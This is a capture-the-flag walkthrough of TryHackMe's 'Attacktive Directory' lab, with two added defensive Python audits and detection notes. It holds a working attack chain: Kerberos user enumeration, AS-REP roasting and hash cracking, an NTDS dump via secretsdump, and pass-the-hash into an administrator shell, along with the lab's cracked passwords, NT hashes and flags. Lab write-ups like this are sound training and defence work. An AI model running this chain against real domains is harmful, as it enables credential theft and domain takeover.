
CTF link: https://tryhackme.com/room/attacktivedirectory TryHackMe username: Touco

Table of contents

  1. Nmap
  2. Kerbrute
  3. Impacket - GetNPUsers
  4. Hashcat
  5. SMBClient
  6. Impacket - Secretsdump
  7. Evil-winrm
  8. Flags
  9. Screenshots

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -O -vv 10.10.101.217 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-11 11:29 CET
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating Ping Scan at 11:29
Scanning 10.10.101.217 [4 ports]
Completed Ping Scan at 11:29, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning 10.10.101.217 [1000 ports]
Discovered open port 139/tcp on 10.10.101.217
Discovered open port 135/tcp on 10.10.101.217
Discovered open port 53/tcp on 10.10.101.217
Discovered open port 3389/tcp on 10.10.101.217
Discovered open port 80/tcp on 10.10.101.217
Discovered open port 445/tcp on 10.10.101.217
Discovered open port 636/tcp on 10.10.101.217
Discovered open port 464/tcp on 10.10.101.217
Discovered open port 88/tcp on 10.10.101.217
Discovered open port 593/tcp on 10.10.101.217
Discovered open port 3268/tcp on 10.10.101.217
Discovered open port 389/tcp on 10.10.101.217
Discovered open port 3269/tcp on 10.10.101.217
Completed SYN Stealth Scan at 11:29, 1.82s elapsed (1000 total ports)
Initiating Service scan at 11:29
Scanning 13 services on 10.10.101.217
Completed Service scan at 11:29, 7.93s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against 10.10.101.217
Retrying OS detection (try #2) against 10.10.101.217
Retrying OS detection (try #3) against 10.10.101.217
Retrying OS detection (try #4) against 10.10.101.217
Retrying OS detection (try #5) against 10.10.101.217
Initiating Traceroute at 11:29
Completed Traceroute at 11:29, 0.04s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:29
Completed Parallel DNS resolution of 2 hosts. at 11:29, 0.01s elapsed
NSE: Script scanning 10.10.101.217.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 8.87s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 1.80s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 10.10.101.217
Host is up, received echo-reply ttl 127 (0.032s latency).
Scanned at 2021-12-11 11:29:12 CET for 31s
Not shown: 987 closed ports
Reason: 987 resets
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-12-11 08:29:20Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-12-11T08:29:32+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-10T08:21:44
| Not valid after:  2022-06-11T08:21:44
| MD5:   96cb 3b50 c97b c2fe fd3b e65a d74f 3195
| SHA-1: bd19 408d a723 1ed7 5ae5 adc2 57a4 3809 285c d30f
| -----BEGIN CERTIFICATE-----
| MIIDCjCCAfKgAwIBAgIQHq2XSXt2T5VALukjgmvMYjANBgkqhkiG9w0BAQsFADAu
| MSwwKgYDVQQDEyNBdHRhY2t0aXZlRGlyZWN0b3J5LnNwb29reXNlYy5sb2NhbDAe
| Fw0yMTEyMTAwODIxNDRaFw0yMjA2MTEwODIxNDRaMC4xLDAqBgNVBAMTI0F0dGFj
| a3RpdmVEaXJlY3Rvcnkuc3Bvb2t5c2VjLmxvY2FsMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEA2AP7t7QTjuAOrcJkSDb/hdar1UcX+07rBd0XDIxUyAOK
| +RUuQ2HZBF6UhpvOk76/P1W/xqEmsFKkwDXfKuwBzub0m181xkY40j79cuRFlhFR
| XwNu/M24CeqOLoKABoKg0iCCXDGO39p27xEr6+E3OiQZgw6ugqV+/+0VViqTImbH
| KsEnfk+07FVZiJt2EzUQEYd3gA+kcTj8XI9Yw+8/b6iXNvZHyA7drZ28a4k3zPDA
| xJIzNQMqG3C61Z6rDVZwIdYZYuYPHLc7nhENvgf0tkwwrxYR33ILrlwAM4kNGxgm
| UORUVhJJoKM3m6Mt47OjkMn7V5+a6GqGqcLjxAheAQIDAQABoyQwIjATBgNVHSUE
| DDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAMrW
| wXZT3tSkSl64HgPH0lRainprhwg3HgL9LtXpfcudqm4kGicUPRX4M+MHZPw8aNeu
| QFyW/VTkYclaGvB0bYwy0cb1tIMAQBvW7XC+EDrzNaK9pDhN1biphlamVMKswsjM
| vp3ElesBsX2cweHpzWj6ZAhYD8tBwd6KwVbwHj9xIhoSbkqMM0yuRmMFy3V8/Kw+
| xAA7shfK4KSttRqMQRy31evHUPG2vYhtvC0WgG7HyAlmwjriMU53HPWkPHJ9mP7E
| n70rOasGQVY6N+BQUIhRd5SUYIqvZISBbBmtdv+UQshgPELp8VViLnNPqkeZSgUJ
| 96O4EKua+DVRcdzr2pk=
|_-----END CERTIFICATE-----
|_ssl-date: 2021-12-11T08:29:42+00:00; -2h00m00s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/11%OT=53%CT=1%CU=38528%PV=Y%DS=2%DC=T%G=Y%TM=61B47D
OS:97%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS
OS:=U)OPS(O1=M505NW8NNS%O2=M505NW8NNS%O3=M505NW8%O4=M505NW8NNS%O5=M505NW8NN
OS:S%O6=M505NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y
OS:%DF=Y%T=80%W=FFFF%O=M505NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD
OS:=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 60858/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 12641/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55562/udp): CLEAN (Failed to receive data)
|   Check 4 (port 19467/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-11T08:29:33
|_  start_date: N/A

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   32.19 ms 10.8.0.1
2   31.96 ms 10.10.101.217

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.10 seconds
           Raw packets sent: 1122 (52.914KB) | Rcvd: 1091 (46.902KB)

Kerbrute

┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ sudo ./kerbrute_linux_amd64 userenum ../userlist.txt -d spookysec.local --dc 10.10.101.217 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.2 (fd5f345) - 12/11/21 - Ronnie Flathers @ropnop

2021/12/11 12:02:05 >  Using KDC(s):
2021/12/11 12:02:05 >   10.10.101.217:88

2021/12/11 12:02:05 >  [+] VALID USERNAME:   james@spookysec.local
2021/12/11 12:02:06 >  [+] VALID USERNAME:   svc-admin@spookysec.local
2021/12/11 12:02:07 >  [+] VALID USERNAME:   James@spookysec.local
2021/12/11 12:02:07 >  [+] VALID USERNAME:   robin@spookysec.local
2021/12/11 12:02:11 >  [+] VALID USERNAME:   darkstar@spookysec.local
2021/12/11 12:02:13 >  [+] VALID USERNAME:   administrator@spookysec.local
2021/12/11 12:02:18 >  [+] VALID USERNAME:   backup@spookysec.local
2021/12/11 12:02:20 >  [+] VALID USERNAME:   paradox@spookysec.local
2021/12/11 12:02:34 >  [+] VALID USERNAME:   JAMES@spookysec.local
2021/12/11 12:02:38 >  [+] VALID USERNAME:   Robin@spookysec.local
2021/12/11 12:03:05 >  [+] VALID USERNAME:   Administrator@spookysec.local
2021/12/11 12:03:59 >  [+] VALID USERNAME:   Darkstar@spookysec.local
2021/12/11 12:04:16 >  [+] VALID USERNAME:   Paradox@spookysec.local
2021/12/11 12:05:18 >  [+] VALID USERNAME:   DARKSTAR@spookysec.local
2021/12/11 12:05:32 >  [+] VALID USERNAME:   ori@spookysec.local
2021/12/11 12:06:01 >  [+] VALID USERNAME:   ROBIN@spookysec.local
2021/12/11 12:07:20 >  Done! Tested 73317 usernames (16 valid) in 315.206 seconds

Impacket - GetNPUsers

┌──(kali㉿kali)-[/opt/impacket/examples]
└─$ python3 GetNPUsers.py spookysec.local/ -usersfile users.txt                                                    
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f95eab8462368a4f0cca10b2cae2dea7$9948054194d0bc31e9490e81defc1361231305090281dabc4526977be9b8ce8e7958cc9f4eaeedffe826794d07b8104d4750643aa20e7efdda29e971b6d71096dc0cd8bb95075ff98a38f0cb9fe470365d8dfa0f8941003c6abe02c9d1081cccc82472eb7ed40d116d41fa36eda004c573d34d0f1f56feddace3c9250a0595c83aebd0a491f84ec61fd880d1341f21b7ce2980f631d3bcc07408d04b6bd3f814dae8d0be04503802c1bc1e2aa66f8fbaa96f03fc00361451ebdc402890bd9e329e9cabc81a15a17520d02f813b186754af06f71863085349de3f871699ec03874ea85660e333aa220afec75e4173dfce8f55
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set

Hashcat

┌──(kali㉿kali)-[~]
└─$ sudo hashcat -O -m 18200 hash passwordlist.txt --show
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f95eab8462368a4f0cca10b2cae2dea7$9948054194d0bc31e9490e81defc1361231305090281dabc4526977be9b8ce8e7958cc9f4eaeedffe826794d07b8104d4750643aa20e7efdda29e971b6d71096dc0cd8bb95075ff98a38f0cb9fe470365d8dfa0f8941003c6abe02c9d1081cccc82472eb7ed40d116d41fa36eda004c573d34d0f1f56feddace3c9250a0595c83aebd0a491f84ec61fd880d1341f21b7ce2980f631d3bcc07408d04b6bd3f814dae8d0be04503802c1bc1e2aa66f8fbaa96f03fc00361451ebdc402890bd9e329e9cabc81a15a17520d02f813b186754af06f71863085349de3f871699ec03874ea85660e333aa220afec75e4173dfce8f55:management2005
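Added example, not part of the original write-up and not code from Impacket or hashcat: a short Python script that splits the $krb5asrep$ line printed by GetNPUsers.py above (the same string hashcat -m 18200 consumed) into its fields, and decodes the userAccountControl bit that GetNPUsers reports as UF_DONT_REQUIRE_PREAUTH so the exposure can be found from the directory side. The hash constant is the one shown above; the account table is constructed sample data, not read from the lab's directory.

```python
"""Parse an AS-REP roasting artefact and audit the account flag that enables it."""
from dataclasses import dataclass

# userAccountControl bit values (MS-SAMR USER_ACCOUNT flags).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Kerberos encryption type numbers (RFC 3961, RFC 4757) and the hashcat mode
# the write-up used for the RC4 variant.
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
HASHCAT_MODE = {23: 18200}

# The hash exactly as GetNPUsers.py printed it in the write-up.
PAGE_HASH = "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f95eab8462368a4f0cca10b2cae2dea7$9948054194d0bc31e9490e81defc1361231305090281dabc4526977be9b8ce8e7958cc9f4eaeedffe826794d07b8104d4750643aa20e7efdda29e971b6d71096dc0cd8bb95075ff98a38f0cb9fe470365d8dfa0f8941003c6abe02c9d1081cccc82472eb7ed40d116d41fa36eda004c573d34d0f1f56feddace3c9250a0595c83aebd0a491f84ec61fd880d1341f21b7ce2980f631d3bcc07408d04b6bd3f814dae8d0be04503802c1bc1e2aa66f8fbaa96f03fc00361451ebdc402890bd9e329e9cabc81a15a17520d02f813b186754af06f71863085349de3f871699ec03874ea85660e333aa220afec75e4173dfce8f55"


@dataclass
class AsRepHash:
    etype: int
    principal: str
    realm: str
    checksum: str   # hex, 16 bytes: for etype 23 the HMAC-MD5 over the ciphertext
    enc_data: str   # hex: the encrypted part of the AS-REP, keyed from the user's password hash


def parse_krb5asrep(line: str) -> AsRepHash:
    """Split "$krb5asrep$<etype>$<user>@<REALM>:<checksum>$<ciphertext>" into fields."""
    if not line.startswith("$krb5asrep$"):
        raise ValueError("not a $krb5asrep$ line")
    _, _, etype, rest = line.strip().split("$", 3)
    principal_part, _, cipher_part = rest.partition(":")
    user, _, realm = principal_part.rpartition("@")
    checksum, _, enc_data = cipher_part.partition("$")
    if len(checksum) != 32 or not enc_data:
        raise ValueError("malformed checksum/ciphertext section")
    return AsRepHash(int(etype), user, realm, checksum.lower(), enc_data.lower())


def describe(h: AsRepHash) -> str:
    """One-line summary for a triage note: who, which cipher, how much ciphertext."""
    mode = HASHCAT_MODE.get(h.etype, "not in this table")
    return (f"{h.principal}@{h.realm}: etype {h.etype} ({ETYPE_NAMES.get(h.etype, 'unknown')}), "
            f"{len(h.enc_data) // 2} bytes of ciphertext, hashcat mode {mode}")


def preauth_audit(uac: int) -> dict:
    """Decode the userAccountControl bits a reviewer cares about for this weakness."""
    return {
        "dont_require_preauth": bool(uac & UF_DONT_REQUIRE_PREAUTH),
        "disabled": bool(uac & UF_ACCOUNTDISABLE),
        "password_never_expires": bool(uac & UF_DONT_EXPIRE_PASSWD),
    }


# Constructed sample (sAMAccountName -> userAccountControl); svc-admin is
# modelled on the write-up's finding, the other entries are invented.
SAMPLE_ACCOUNTS = {
    "svc-admin": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH,
    "james": UF_NORMAL_ACCOUNT,
    "backup": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
    "old-svc": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE,
}


def roastable_accounts(accounts: dict) -> list:
    """Enabled accounts with pre-authentication disabled: the set GetNPUsers would report."""
    return sorted(name for name, uac in accounts.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)


if __name__ == "__main__":
    print(describe(parse_krb5asrep(PAGE_HASH)))
    print("pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
```

The same bit can be listed straight from the directory with the LDAP matching-rule filter `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` (4194304 is 0x400000). On the domain controller, a roast of this kind shows up as Event ID 4768 with Pre-Authentication Type 0 and, for etype 23, Ticket Encryption Type 0x17; clearing the flag on svc-admin, or at least enforcing AES, removes the offline-guessing opportunity.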

SMBClient

┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ smbclient -L 10.10.101.217 -U svc-admin
Enter WORKGROUP\svc-admin's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backup          Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ smbclient //10.10.101.217/backup -U svc-admin
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 21:08:39 2020
  ..                                  D        0  Sat Apr  4 21:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 21:08:53 2020

        8247551 blocks of size 4096. 3636433 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
smb: \> exit

┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ ls
backup_credentials.txt

┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ more backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

┌──(kali㉿kali)-[~/kerbute/kerbrute/dist/v1.0.2]
└─$ base64 -d b64 
backup@spookysec.local:backup2517860

Impacket - Secretsdump

┌──(kali㉿kali)-[/opt/impacket/examples]
└─$ sudo secretsdump.py -just-dc-ntlm spookysec.local/backup:backup2517860@10.10.101.217
[sudo] Mot de passe de kali : 
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:091a2827452fa9a7eb93398f8feea937:::
[*] Cleaning up... 
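Added example, not part of the original write-up and not an Impacket feature: a Python audit over the secretsdump output above. Its input lines are a subset of that dump; the checks (blank passwords, LM hashes still stored, accounts sharing an NT hash, and any account whose hash equals the RID 500 Administrator's) are what a defender runs on such a dump after an authorised assessment or a recovery exercise.

```python
"""Post-process a secretsdump NTDS dump for blank and reused passwords."""
from collections import defaultdict

# NT hash of the empty password (MD4 over zero bytes of UTF-16LE).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash of the empty password, what a DC stores when LM hashes are not kept.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# Lines copied from the write-up's secretsdump output (domain\uid:rid:lmhash:nthash:::).
DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:091a2827452fa9a7eb93398f8feea937:::
"""


def parse_dump(text: str) -> list:
    """Turn pwdump-style lines into records; status lines such as "[*] ..." are skipped."""
    records = []
    for line in text.strip().splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        account, rid, lm, nt = parts[:4]
        domain, _, sam = account.rpartition("\\")
        records.append({"domain": domain, "sam": sam, "rid": int(rid),
                        "lm": lm.lower(), "nt": nt.lower(),
                        "is_machine": sam.endswith("$")})
    return records


def audit(records: list) -> dict:
    """Group by NT hash: equal hashes mean equal passwords, because NT hashes are unsalted."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["sam"])
    builtin_admin = next((r for r in records if r["rid"] == 500), None)
    admin_twins = []
    if builtin_admin is not None:
        admin_twins = sorted(s for s in by_nt[builtin_admin["nt"]] if s != builtin_admin["sam"])
    return {
        "empty_password": sorted(r["sam"] for r in records if r["nt"] == EMPTY_NT_HASH),
        "lm_hash_stored": sorted(r["sam"] for r in records if r["lm"] != EMPTY_LM_HASH),
        "shared_nt_hash": sorted(sorted(users) for users in by_nt.values() if len(users) > 1),
        "rid500_password_reused_by": admin_twins,
        "machine_accounts": sorted(r["sam"] for r in records if r["is_machine"]),
    }


if __name__ == "__main__":
    for key, value in audit(parse_dump(DUMP)).items():
        print(f"{key}: {value}")
```

Run against the lines above, the audit flags Guest as blank, skidy and breakerofthings as sharing a password, and a-spooks as carrying the same NT hash as the RID 500 Administrator; that last reuse is why a hash from a low-profile account is as good as the built-in administrator's, and it is found without cracking anything. Replication of this kind from an account that is not a domain controller is itself visible on the DC as Event ID 4662 for the directory replication control access rights, which is the detection to have in place for the DRSUAPI method secretsdump reports.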

Evil-winrm

┌──(kali㉿kali)-[~/…/kerbrute/dist/v1.0.2/evil-winrm]
└─$ ruby evil-winrm.rb -i 10.10.101.217 -H 0e0363213e37b94221497260b0bcb4fc -u administrator
Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd c:
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd c:\
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/4/2020  11:32 AM                inetpub
d-----        9/17/2020   4:43 PM                PerfLogs
d-r---         4/4/2020  11:26 AM                Program Files
d-----        9/15/2018   2:06 AM                Program Files (x86)
d-----         4/4/2020  12:07 PM                Shares
d-r---        9/17/2020   4:03 PM                Users
d-----        9/17/2020   4:46 PM                Windows


*Evil-WinRM* PS C:\> cd users
*Evil-WinRM* PS C:\users> dir

Flags

*Evil-WinRM* PS C:\> dir C:\users\backup\Desktop\


    Directory: C:\users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


*Evil-WinRM* PS C:\> more C:\users\backup\Desktop\PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}

*Evil-WinRM* PS C:\> dir C:\users\svc-admin\Desktop\


    Directory: C:\users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\> more C:\users\svc-admin\Desktop\user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}

*Evil-WinRM* PS C:\> dir C:\users\administrator\Desktop\


    Directory: C:\users\administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\> more C:\users\administrator\Desktop\root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Screenshots

ad_attack.png tryhackme.png